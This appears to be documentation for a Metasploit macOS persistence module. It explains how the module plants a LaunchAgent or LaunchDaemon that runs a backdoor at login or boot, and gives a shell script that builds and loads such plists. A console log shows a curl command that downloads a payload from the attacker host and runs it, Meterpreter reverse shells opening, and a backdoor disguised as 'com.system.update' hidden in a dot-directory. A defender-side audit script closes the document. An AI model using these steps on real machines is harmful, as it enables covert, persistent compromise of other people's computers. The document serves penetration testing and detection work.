Vulnerable Application
This module provides a persistent boot payload by creating a launch item, which can be
a LaunchAgent or a LaunchDaemon. A LaunchAgent runs with the permissions of the logged-in user
and is triggered at login by a plist entry in ~/Library/LaunchAgents. A LaunchDaemon runs with
elevated (root) privileges and is launched at boot, before any user logs in, by a plist entry in
/Library/LaunchDaemons; that directory is root-owned, so installing a LaunchDaemon requires a root session.
In either case the plist entry names an executable that launchd runs at boot or at login.
Verified on macOS 11.7.10 (Big Sur) and 13.7.4 (Ventura)
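To make the description concrete, the following is an added example and not the module's own code: it builds the kind of launchd property list the module installs, writes it into the directory launchd scans for the chosen item type, and removes it again. The label com.example.agent, the program path and the DIR override are hypothetical values chosen for illustration. RunAtLoad gives the "run at login/boot" behaviour described above and KeepAlive gives the restart-on-exit behaviour of the module's KEEPALIVE option.

```shell
#!/bin/sh
# Added example, not the Metasploit module's own code. Builds the launchd plist
# described above and installs or removes it. Inputs such as the label
# "com.example.agent" are hypothetical values chosen for illustration.

# make_launch_plist LABEL PROGRAM KEEPALIVE(true|false): print the plist XML.
# RunAtLoad makes launchd start the program as soon as the item is loaded (login
# for agents, boot for daemons); KeepAlive makes launchd restart it when it exits.
make_launch_plist() {
  label=$1
  program=$2
  keepalive=${3:-true}
  cat <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>${label}</string>
    <key>ProgramArguments</key>
    <array>
        <string>${program}</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <${keepalive}/>
</dict>
</plist>
EOF
}

# plist_dir_for KIND: the directory launchd scans for this kind of item.
plist_dir_for() {
  case $1 in
    LaunchAgent)  printf '%s\n' "$HOME/Library/LaunchAgents" ;;
    LaunchDaemon) printf '%s\n' "/Library/LaunchDaemons" ;;
    *) echo "unknown launch item type: $1" >&2; return 1 ;;
  esac
}

# install_launch_item KIND LABEL PROGRAM KEEPALIVE [DIR]: write LABEL.plist into
# DIR (default: the launchd directory for KIND) and, where launchctl exists
# (macOS), load it so it starts now and at every login/boot. Prints the path.
install_launch_item() {
  kind=$1
  label=$2
  program=$3
  keepalive=$4
  if [ -n "$5" ]; then
    dir=$5
  else
    dir=$(plist_dir_for "$kind") || return 1
  fi
  mkdir -p "$dir" || return 1
  plist="$dir/$label.plist"
  make_launch_plist "$label" "$program" "$keepalive" > "$plist" || return 1
  # launchd refuses a daemon plist that is group- or world-writable, so tighten
  # the mode (it must also be root-owned under /Library/LaunchDaemons).
  if [ "$kind" = LaunchDaemon ]; then
    chmod 644 "$plist"
  fi
  if command -v launchctl >/dev/null 2>&1; then
    launchctl load -w "$plist"
  fi
  printf '%s\n' "$plist"
}

# remove_launch_item PLIST: the reverse of the above, mirroring the cleanup line
# the module prints (unload the job, drop the label, delete the file).
remove_launch_item() {
  plist=$1
  label=$(basename "$plist" .plist)
  if command -v launchctl >/dev/null 2>&1; then
    launchctl unload -w "$plist" 2>/dev/null
    launchctl remove "$label" 2>/dev/null
  fi
  rm -f "$plist"
}
```

On a Mac, `install_launch_item LaunchAgent com.example.agent "$HOME/Library/.example/agent" true` drops ~/Library/LaunchAgents/com.example.agent.plist and loads it; the same call with LaunchDaemon as the first argument needs root and writes to /Library/LaunchDaemons. The optional DIR argument exists so the plist generation can be exercised on a non-Mac host without touching launchd.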
Verification Steps
- Start msfconsole
- Get a shell
- Do: use exploit/osx/persistence/launch_plist
- Do: run
- You should get a shell (immediately if RUN_NOW is true, otherwise once the launch item is loaded or the user next logs in).
Options
BACKDOOR_PATH
Path to hide the backdoor on the target. Defaults to ~/Library/.<random>/com.system.update
KEEPALIVE
Continually restart the payload exe if it crashes/exits. Defaults to true
RUN_NOW
Run the installed payload immediately. Defaults to false
LAUNCH_ITEM
Type of launch item, see description for more info. Choices are LaunchAgent, LaunchDaemon. Default is LaunchAgent
Scenarios
13.7.4
Initial access via web delivery
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 8
target => 8
resource (/root/.msf4/msfconsole.rc)> set srvport 8383
srvport => 8383
resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4747
lport => 4747
resource (/root/.msf4/msfconsole.rc)> set URIPATH m
URIPATH => m
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 111.111.1.111:4747
[*] Using URL: http://111.111.1.111:8383/m
[*] Server started.
[*] Run the following command on the target machine:
curl -sk --output 8D4tNTA4 http://111.111.1.111:8383/m; chmod +x 8D4tNTA4; ./8D4tNTA4& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 222.22.2.2 web_delivery - Delivering Payload (815032 bytes)
[*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49156) at 2025-02-19 19:04:25 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/osx/persistence/launch_plist
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > getuid
Server username: macos
(Meterpreter 1)(/Users/macos) > sysinfo
Computer : 20.20.20.21
OS : macOS Ventura (macOS 13.7.4)
Architecture : x86
BuildTuple : x86_64-apple-darwin
Meterpreter : x64/osx
Persistence
[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > set payload payload/osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
[msf](Jobs:1 Agents:1) exploit(osx/persistence/launch_plist) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) >
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /Users/macos/Library is writable
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/macos/Library/.QVecGcAF/com.system.update
[+] LaunchAgent added: /Users/macos/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/macos/Library/.QVecGcAF ; rm /Users/macos/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250219.0704/20.20.20.21_20250219.0704.rc
[msf](Jobs:2 Agents:1) exploit(osx/persistence/launch_plist) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/Users/macos) > shell
Process 2138 created.
Channel 8 created.
launchctl load -w /Users/macos/Library/LaunchAgents/com.system.update.plist
[*] Meterpreter session 5 opened (111.111.1.111:4444 -> 222.22.2.2:49157) at 2025-02-19 19:11:23 -0500
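The artifact left on disk above is a plist in ~/Library/LaunchAgents whose ProgramArguments points at a binary in a hidden dot-directory under ~/Library. The following added defender-side check is not part of the module: it scans launchd item directories and reports plists whose program lives in a hidden directory or a temp directory. The reason strings and the directories passed on the command line are illustrative choices.

```shell
#!/bin/sh
# Added defender-side example, not part of the module. Scans launchd item
# directories for plists whose program lives somewhere a legitimate agent rarely
# does (a hidden dot-directory, as with the module's default BACKDOOR_PATH, or a
# temp directory) and prints one tab-separated line per finding.

# first_program PLIST: print the program launchd would run for this plist, i.e.
# the string under the Program key or the first element of ProgramArguments.
# Handles both one-key-per-line and single-line plist layouts.
first_program() {
  awk '
    /<key>Program(Arguments)?<\/key>/ {
      want = 1
      sub(/.*<key>Program(Arguments)?<\/key>/, "")   # drop anything before the key
    }
    want && match($0, /<string>[^<]*<\/string>/) {
      print substr($0, RSTART + 8, RLENGTH - 17)     # strip <string> and </string>
      exit
    }' "$1"
}

# audit_launch_items DIR...: print "plist<TAB>program<TAB>reasons" for each
# suspicious item found in the given directories.
audit_launch_items() {
  for dir in "$@"; do
    for plist in "$dir"/*.plist; do
      [ -f "$plist" ] || continue
      prog=$(first_program "$plist")
      reasons=""
      case $prog in
        */.*) reasons="hidden directory in program path" ;;
      esac
      case $prog in
        /tmp/*|/private/tmp/*|/var/tmp/*|/private/var/tmp/*)
          reasons="${reasons:+$reasons; }program in a temp directory" ;;
      esac
      if [ -z "$prog" ]; then
        reasons="no Program/ProgramArguments found"
      fi
      if [ -n "$reasons" ]; then
        printf '%s\t%s\t%s\n' "$plist" "$prog" "$reasons"
      fi
    done
  done
}

# On a live Mac, cover the current user's agents plus the two system-wide
# directories (other users' ~/Library/LaunchAgents need root to read):
#   audit_launch_items "$HOME/Library/LaunchAgents" /Library/LaunchAgents /Library/LaunchDaemons
```

Run against the host from the scenario above, the com.system.update.plist entry is reported because its program sits under /Users/macos/Library/.QVecGcAF; a stock agent pointing at /usr/bin or /Applications is not. The check is deliberately narrow (path shape only) so it can serve as a first triage pass; anything it flags still needs the binary inspected.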